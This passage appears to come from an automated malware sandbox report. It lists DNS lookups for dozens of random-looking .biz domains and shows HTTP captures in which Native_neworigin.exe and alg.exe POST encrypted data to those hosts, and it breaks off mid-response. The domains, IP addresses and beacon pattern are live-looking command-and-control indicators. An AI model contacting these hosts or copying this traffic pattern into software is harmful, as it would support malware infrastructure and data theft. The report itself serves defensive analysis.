                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.383866072 CET1.1.1.1192.168.2.70xc2No error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.896861076 CET1.1.1.1192.168.2.70x5d4No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.262176037 CET1.1.1.1192.168.2.70x4130No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.941510916 CET1.1.1.1192.168.2.70xa224No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.571365118 CET1.1.1.1192.168.2.70xe48dNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.134430885 CET1.1.1.1192.168.2.70xab29No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.264435053 CET1.1.1.1192.168.2.70xc6adNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.264435053 CET1.1.1.1192.168.2.70xc6adNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.842132092 CET1.1.1.1192.168.2.70x3418No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.702601910 CET1.1.1.1192.168.2.70xa6e2No error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.732208014 CET1.1.1.1192.168.2.70x828fName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.738410950 CET1.1.1.1192.168.2.70xa774No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.741246939 CET1.1.1.1192.168.2.70x27aeNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.597167015 CET1.1.1.1192.168.2.70xeeaeNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.235400915 CET1.1.1.1192.168.2.70x79bdName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.244580030 CET1.1.1.1192.168.2.70xc74dName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.252717972 CET1.1.1.1192.168.2.70x7e9eNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.097012997 CET1.1.1.1192.168.2.70xa513No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.958441973 CET1.1.1.1192.168.2.70xf7bfNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.640697002 CET1.1.1.1192.168.2.70xb136No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.640697002 CET1.1.1.1192.168.2.70xb136No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.050741911 CET1.1.1.1192.168.2.70xf1caName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.058545113 CET1.1.1.1192.168.2.70x8f44No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.090626955 CET1.1.1.1192.168.2.70x8f44No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.626684904 CET1.1.1.1192.168.2.70xae01Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.635644913 CET1.1.1.1192.168.2.70x539aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.644619942 CET1.1.1.1192.168.2.70x41No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                      • gxe0.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      • api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      • giliplg.biz

                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      0192.168.2.74988354.244.188.177802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.390866041 CET348OUTPOST /bkk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.390921116 CET844OUTData Raw: ac 8c d8 e0 f0 74 3a a5 40 03 00 00 0a 34 c3 12 f8 c2 40 2a 05 76 f7 39 1e ef e0 a8 1f fc e1 47 66 03 8a 35 41 ad b2 76 c5 71 0e f2 43 07 86 67 68 0e 61 42 cf 0e 7e de 13 c2 48 bf ab d5 98 e2 5f d2 72 5c 8c 9e ab e2 f6 e2 60 8a 8b 85 20 e2 3a cf
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: t:@4@*v9Gf5AvqCghaB~H_r\` :` 5JXuanQ19FFCLTy`z{NF5y<[7^w%^2"41m@@Li>9=n[eOyR8DYPr?PRx6?um)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.372798920 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4d4e51940d1812d6bf28f6fa38b7b0e7|155.94.241.187|1731920211|1731920211|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      1192.168.2.74988818.141.10.107802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.729011059 CET346OUTPOST /nyt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.729038000 CET844OUTData Raw: 36 3e fc 30 7c 4a 7e fa 40 03 00 00 d4 be f5 51 c8 03 7e e7 b9 e0 a5 45 a0 25 83 97 32 56 a8 ea 1e 7a e6 d8 8f 07 f7 72 11 8b 6d d5 1b 9b e0 fd dd 92 f8 b6 0d 3b 5b 93 6e 77 d4 57 e2 80 5f de d5 fd e3 f0 b0 33 71 b6 a5 4f d9 fa 5a 26 9e 34 61 55
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6>0|J~@Q~E%2Vzrm;[nwW_3qOZ&4aUMO|9 plZ-f#yyfaoE3qo\j2dB%5aBBv.Un"V[<P>A=pi020X;lufJ
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.155417919 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=023f445160a5aecbadc813e8874d50d2|155.94.241.187|1731920212|1731920212|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      2192.168.2.74989554.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.922804117 CET352OUTPOST /eoqitiy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.922847033 CET778OUTData Raw: 00 60 76 06 8c 4b 4a 07 fe 02 00 00 17 d6 d9 12 29 21 93 82 43 fc 7a f0 d4 9b 13 a9 ee 64 55 89 ae f8 f8 8c 9a 39 b5 de 59 50 ba b3 ff e5 8d 35 eb c0 f0 0d 42 98 a1 10 20 47 6b 3f fa 8d 14 88 a3 88 60 57 41 95 b8 7f 1b 4b c1 9c 9d 5e 3c 4b cf f0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: `vKJ)!CzdU9YP5B Gk?`WAK^<KIhzA#w,L~K39xQY.oQ_p4@To+Dmlrn~S+__":vzs>E*?$Ds?Fu,hJwon}5=:|c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.715158939 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=2c20daa257162b629b3ed00448848056|155.94.241.187|1731920213|1731920213|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      3192.168.2.74989954.244.188.177802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.417573929 CET350OUTPOST /iwtyrexju HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.417598963 CET844OUTData Raw: ef 8b d5 0b d8 0e c7 fb 40 03 00 00 7c 8b 4e f0 8e 6f 5f 01 4e de c8 23 ec 38 98 f8 12 e6 5a 6e 67 3c d0 e3 55 5c 68 b9 ae 51 ec fd 9d 51 66 26 8d 3a 48 73 18 2e 0f 71 bc 23 5d 46 2b a6 dd 85 a1 2b 54 23 d5 fc 57 b5 2d 96 b3 37 1c 5c 77 ba 5a 81
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: @|No_N#8Zng<U\hQQf&:Hs.q#]F++T#W-7\wZgpDjP,f"K^oRV-}y"{xaXPc[c7P*8fYpBH>Vwe|k\:8V5T3iO8.]JW ;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.225683928 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=c1d49555b512b627782e95e2d89f9192|155.94.241.187|1731920214|1731920214|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      4192.168.2.74990518.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.621798992 CET347OUTPOST /jevf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.621834993 CET778OUTData Raw: 90 de d3 46 2b 33 a5 9f fe 02 00 00 1c c9 9c c7 80 a3 5e ea 0e b6 f0 e3 84 8d 18 38 ae 04 96 66 54 91 47 01 08 65 fb 5b 66 df 42 15 84 52 e6 87 6f 3f 40 8c 76 65 92 f9 2d b3 f8 20 94 7a 23 ff e8 62 7d da 99 93 7b 8a f5 0a 08 67 92 25 0a fd 13 d5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: F+3^8fTGe[fBRo?@ve- z#b}{g%zv&Q,YNhIScRhOtacVTbMWA3VrH@~F'emB]%RYb;5&55B`AxvKEf0fSizI?
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.052212954 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
